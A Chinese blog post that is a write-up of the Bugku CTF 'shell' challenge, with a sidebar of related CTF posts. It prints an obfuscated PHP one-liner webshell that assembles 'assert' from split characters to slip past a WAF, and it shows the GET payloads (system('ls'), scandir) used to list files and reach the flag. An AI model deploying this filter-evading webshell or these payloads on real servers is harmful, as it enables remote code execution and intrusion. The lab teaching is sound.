【CTF bugku shell】关于assert()代码执行漏洞利用、目录查询函数scandir()/system()

最新推荐文章于 2023-04-04 16:34:19 发布
最新推荐文章于 2023-04-04 16:34:19 发布
阅读量4.1k 收藏 3
点赞数 1
分类专栏: CTF 文章标签: web安全 CTF php代码审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zw05011/article/details/122506642
版权

知识点

assert()代码执行漏洞

目录查询函数scandir()/system()

题目


1.打开场景,啥有没有,常规操作:查看源码,扫路径,抓包也是啥也没有
2.查看作者提示,送给大家一个过狗一句话

$poc="a#s#s#e#r#t";
$poc_1=explode("#",$poc);
$poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5];
$poc_2($_GET['s'])

通过代码审计得到assert($_GET[‘s’])

因此获得提示:

  1. 存在参数s
  2. 存在assert()代码执行漏洞
  3. 可以利用参数s传入php代码,利用assert()执行代码

其实就是运用webshell过waf
assert、eval都是能代码执行shell命令的危险函数之一
那么可以直接构造,首先想到system函数和scandir函数,没禁用
?s=system(“ls”)

?s=scandir(./)

查看当前路径,找到flag文件,

直接在url里面输入读取就好了



反正就是个简单的系统函数调用,如果system函数都没禁的话,我估计他也没禁什么,随便你构造

zw05011
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BugkuCTF(old)----流量分析题目Writeup
Au
09-26 1808
flag被盗 文件不是很大,粗略看了一下,发现了shell.php字段 筛选为http流量,追踪TCP查看 直接得到flagflag{This_is_a_f10g} 中国菜刀 下载解压得到数据包,比较小只有7kb 只有TCP和HTTP协议流量,追踪TCP流查看,发现flag.tar.gz压缩包 使用kali集成的 binwa...
XCTF-攻防世界CTF平台-Web类——19、mfw(.Git源代码泄露、phpassert断言)
Onlyone_1314的博客
12-11 3744
打开题目地址: 是一个作者用php写的网站 在About页面,作者介绍他使用了Git、PHP、Bootstrap 之后我们查看页面源代码: 在每个页面的注释里都有一个隐藏页面:?page=flag,提示flag应该就在这个页面。我们也注意到home、contact和about页面都是通过访问index.php页面以GET方式的page参数来跳转页面的:?page=home、?page=contact、?page=about。 所以我们直接访问: http://111.200.241.244:60434
assert()理解
weixin_30872157的博客
09-25 1468
源自一道CTF题,理解全部写在注释里面 if (isset($_GET['page'])) { $page = $_GET['page']; } else { $page = "home"; // } $file = "templates/" . $page . ".php"; // I heard '..' is dangerous! /...
buuctf(探险2)
qq_62046696的博客
08-08 898
先上传一个一句话木马.,过滤了然后用可以通过,大概还是过滤了
BUGKU-CTF入门笔记
Emooooor的博客
11-29 2325
CTFBUGKU,入门
CTF 离线C PHP python 汇编函数查询 chm电子书合集
10-06
汇编函数查询手册能指导你理解和解析二进制代码,分析其运行逻辑,这对于破解加密算法、修复漏洞等挑战至关重要。 6. **CHM电子书的优势**: CHM格式的书籍具有小巧、集成的特点,可以快速检索内容,非常适合离线...
文件包含漏洞汇总-黑客/渗透测试/CTF通用
最新发布
08-09
适用于文件包含漏洞初学者去进一步了解漏洞的利用,总结前人的经验
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-7.zip
12-07
【标题】"BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-7.zip" 指的是2021年BugKu网络安全平台举办的AWD(Attack-Defend,攻防)CTF(Capture The Flag,夺旗)排位赛的实战题目,其中的"7"可能代表该赛事的第七个...
bugku ctf misc wp.pdf
07-05
根据所提供的文件内容,我们可以得知,这是一个针对“bugku ctf misc wp.pdf”文件的CTF(Capture The Flag)比赛中的misc(杂项)类别题目的write-up(解答过程记录)。Misc类别通常包含各种非传统类型的题目,要求...
BUUCTF-web-[RoarCTF 2019]Easy Calc
weixin_44866139的博客
05-15 638
有一段注释说这题有WAF,那肯定思路就是如何绕过WAF拿到flag了 进入题目是一个计算器,只能输入正常的数学计算式,字母什么的都输入不了,回显计算不出来,查看源码,发现是在calc.php里面计算的,而且提示说存在Waf,这些字母应该就是Waf过滤的,访问calc.php <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num'];
ctf刷题小结
quan9i的博客
05-15 6402
CTF刷题小记,文章同步于我的个人博客,欢迎大家访问
bugku web知识点总结_2
yifujiadeng的博客
04-25 332
bugku web总结(14-24) web14: 打开题目,可以看到一个链接click me 点击后显示了index.php,可能提示flag存在index.php中 如上图我们还可以看到多了一个参数file,很像是文件包含,这里我们可以尝试使用php伪协议读取文件内容,放上一个介绍php伪协议的文章链接https://segmentfault.com/a/1190000018991087 构造payload:php://filter/read=convert.base64-encode/resour
CTF命令执行及绕过技巧
热门推荐
JBlock的博客
03-07 2万+
前言 今天是代码审计部分的一个技巧补充!前些阵子做了sql注入回顾篇系列!今天开启php代码审计系列! 今天内容主要是CTF中命令注入及绕过的一些技巧!以及构成RCE的一些情景! 文章目录前言正文代码执行代码执行的几种方式命令执行常见命令执行函数绕过姿势敏感字符绕过处理无回显的命令执行Think one Think 正文 在详细介绍命令注入之前,有一点需要注意:命令注入与远程代码执行不同。他们的区...
ctf】命令执行漏洞(一)
wlllllianqing的博客
10-12 2123
命令执行漏洞原理 命令执行漏洞,就是指用户通过浏览器或其他辅助程序提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,用户可以提交恶意语句并交由服务器执行。 在操作系统中,“&、|、||”都可以作为命令连接符使用,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令。 相关函数 ...
ctf 命令执行总结
njqfb的博客
06-04 2836
命令执行绕过总结 linux系统查看文件命令 more 一页一页的显示文件内容 less 和more类似 head 只显示头几行 tail 只显示最后几行 nl 显示时还输出行号 tailf cat 由第一行开始显示内容,并将所有内容输出 tac 从最后一行倒序显示内容,并将所有内容输出 od 以二进制的方式读取内容 vi 编辑文件 vim 编辑文件,是vi的升级版 sort 将以默认的方式将文本文件的第一列以ASCI
浅谈CTF中的逻辑漏洞
PICACHU+++的博客
10-07 1340
逻辑漏洞主要是指程序逻辑上出现的问题,例如逻辑不严密或者逻辑太复杂,从而导致一些逻辑分支不能正常处理或处理错误,通常这类漏洞多以月权访问,密码爆破等等。
assert()代码执行漏洞
qq_33505576的博客
07-01 3240
<?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) ?> 使用?s=print_r(scandir('./'))进行目录扫描以发现代码的执...
【学习笔记】CWE-617: 可达的assertion断言安全漏洞
rm -rf *
04-04 168
由于public方法在调用时系统必须进行参数检查而私有方法是直接使用的,因此不要使用断言进行public方法的参数有效性检查以及执行程序需要完成的正常操作,当断言用于公共方法中的参数检查时,就可能会出现“可达的assertion”安全漏洞。在私有方法调用时会使用直接传入的参数,如果私有方法对参数有特定的要求可以在方法处使用断言进行参数检查。在处理恶意数据包时,受影响的产品服务器中的缺陷可能会导致断言失败,这可能会导致拒绝服务的情况。不变量反应程序的特性,可以通过分析程序的不变量监测程序运行中的异常。
-cm assert
10-26
-cm assert是一种用于C语言程序的代码覆盖率工具,它可以帮助开发人员检测程序中的错误和漏洞assert是一个宏定义,用于在程序中检查某个条件是否为真,如果不为真,则会输出错误信息并终止程序的执行。-cm assert则是在程序中插入assert语句,并记录每个assert语句是否被执行过,从而计算代码覆盖率。 -cm assert的使用方法如下: 1. 在编译时加入-cm选项,例如gcc -cm test.c -o test 2. 在程序中插入assert语句,例如assert(x > 0); 3. 运行程序,-cm assert会记录每个assert语句是否被执行过 4. 使用cmcov命令生成代码覆盖率报告,例如cmcov test.cmcov -cm assert可以帮助开发人员发现程序中的错误和漏洞,提高代码质量和可靠性。同时,它也可以用于测试用例的设计和优化,帮助开发人员提高测试效率和覆盖率。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值